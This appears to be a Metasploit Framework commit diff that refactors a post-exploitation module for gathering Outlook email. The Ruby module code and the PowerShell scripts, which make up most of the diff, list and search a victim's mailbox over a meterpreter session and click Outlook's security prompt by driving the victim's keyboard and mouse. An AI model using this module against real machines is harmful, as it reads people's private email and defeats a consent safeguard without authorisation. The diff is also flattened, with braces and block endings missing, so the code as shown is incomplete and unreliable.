outlook post module fixes

This commit is contained in:
Christian Mehlmauer 2014-12-06 00:28:44 +01:00
parent 7c62fa5c95
commit 9187a409ec
No known key found for this signature in database
2 changed files with 87 additions and 88 deletions

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@ -0,0 +1,47 @@
function GetSubfolders($root) {
$folders = @()
$folders += $root
foreach ($folder in $root.Folders) {
$folders += GetSubfolders($folder)
return $folders
function List-Folder {
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNameSpace("MAPI")
$account = $NameSpace.Folders
$folders = @()
foreach ($acc in $account) {
foreach ($folder in $acc.Folders) {
$folders += GetSubfolders($folder)
$folders | FT FolderPath
function Get-Emails {
param ([String]$searchTerm,[String]$Folder)
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNameSpace("MAPI")
$account = $NameSpace.Folders
$found = $false
foreach ($acc in $account) {
try {
$Email = $acc.Folders.Item($Folder).Items
$result = $Email | Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
if($result) {
$found = $true
$result | Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
} catch {
Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
if(-Not $found) {
Write-Host "Searchterm" $searchTerm "not found"

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@ -9,111 +9,63 @@ class Metasploit3 < Msf::Post
include Msf::Post::Windows::Registry
include Msf::Post::Windows::Powershell
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
def initialize(info={})
'Name' => 'Windows Gather Outlook Email Messages',
'Description' => %q{
This module allows you to read and search email messages from the local Outlook installation using powershell. Please note that this module is manipulating the victims keyboard/mouse.
If a victim is behind the target system, he might notice the activities of this module. Tested on Windows 8.1 x64 with Office 2013.
'License' => MSF_LICENSE,
'Author' => [ 'Wesley Neelen <security[at]forsec.nl>' ],
'References' => [ 'URL', 'https://forsec.nl/2014/11/reading-outlook-using-metasploit' ],
'Platform' => [ 'win' ],
'Arch' => [ 'x86', 'x64' ],
'SessionTypes' => [ 'meterpreter'],
'Actions' => [
[ 'LIST', { 'Description' => 'Lists all folders' } ],
[ 'SEARCH', { 'Description' => 'Searches for an email' } ]
'DefaultAction' => 'LIST'
'Name' => 'Windows Gather Outlook Email Messages',
'Description' => %q{
This module allows you to read and search email messages from the local Outlook installation using powershell. Please note that this module is manipulating the victims keyboard/mouse.
If a victim is behind the target system, he might notice the activities of this module. Tested on Windows 8.1 x64 with Office 2013.
'License' => MSF_LICENSE,
'Author' => [ 'Wesley Neelen <security[at]forsec.nl>' ],
'References' => [ 'URL', 'https://forsec.nl/2014/11/reading-outlook-using-metasploit' ],
'Platform' => [ 'win' ],
'Arch' => [ 'x86', 'x64' ],
'SessionTypes' => [ 'meterpreter' ],
'Actions' => [
[ 'LIST', { 'Description' => 'Lists all folders' } ],
[ 'SEARCH', { 'Description' => 'Searches for an email' } ]
'DefaultAction' => 'LIST'
OptString.new('FOLDER', [ false, ' The e-mailfolder to read (e.g. Inbox)' ]),
OptString.new('KEYWORD', [ false, ' Search e-mails by the keyword specified here' ]),
OptString.new('A_TRANSLATION', [ false, ' Fill in the translation of the word "Allow" in the targets system language, to click on the security popup.' ]),
OptString.new('ACF_TRANSLATION', [ false, ' Fill in the translation of the phrase "Allow access for" in the targets system language, to click on the security popup.' ]),
OptString.new('FOLDER', [ false, ' The e-mailfolder to read (e.g. Inbox)' ]),
OptString.new('KEYWORD', [ false, ' Search e-mails by the keyword specified here' ]),
OptString.new('A_TRANSLATION', [ false, ' Fill in the translation of the word "Allow" in the targets system language, to click on the security popup.' ]),
OptString.new('ACF_TRANSLATION', [ false, ' Fill in the translation of the phrase "Allow access for" in the targets system language, to click on the security popup.' ]),
], self.class)
def listBoxes
# This function prints a listing of available mailbox folders
psh_script = %Q|
function GetSubfolders($root) {
$folders = @()
$folders += $root
foreach ($folder in $root.Folders) {
$folders += GetSubfolders($folder)
return $folders
function List-Folder {
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNameSpace("MAPI")
$account = $NameSpace.Folders
$folders = @()
foreach ($acc in $account) {
foreach ($folder in $acc.Folders) {
$folders += GetSubfolders($folder)
$folders \| FT FolderPath
def execute_outlook_script(command)
base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "outlook.ps1"))
psh_script = base_script << command
compressed_script = compress_script(psh_script)
cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
while(d = cmd_out.channel.read)
print ("#{d}")
print ("#{d}")
currentidle = session.ui.idle_time
print_status("System has currently been idle for #{currentidle} seconds")
vprint_status("System has currently been idle for #{currentidle} seconds")
# This function prints a listing of available mailbox folders
def listBoxes
command = 'List-Folder'
# This functions reads Outlook using powershell scripts
def readEmails(folder,keyword,atrans,acftrans)
# This functions reads Outlook using powershell scripts
view = framework.threads.spawn("ButtonClicker", false) {
psh_script = %Q|
function Get-Emails {
param ([String]$searchTerm,[String]$Folder)
Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
$Outlook = New-Object -ComObject Outlook.Application
$Namespace = $Outlook.GetNameSpace("MAPI")
$account = $NameSpace.Folders
$found = $false
foreach ($acc in $account) {
try {
$Email = $acc.Folders.Item($Folder).Items
$result = $Email \| Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
if($result) {
$found = $true
$result \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
} catch {
Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
if(-Not $found) {
Write-Host "Searchterm" $searchTerm "not found"
Get-Emails "#{keyword}" "#{folder}"
compressed_script = compress_script(psh_script)
cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
while(d = cmd_out.channel.read)
print ("#{d}")
command = "Get-Emails \"#{keyword}\" \"#{folder}\""
def clickButton(atrans,acftrans)
@ -190,7 +142,7 @@ class Metasploit3 < Msf::Post
case action.name
when 'LIST'
print_good('Available folders in the mailbox: ')
when 'SEARCH'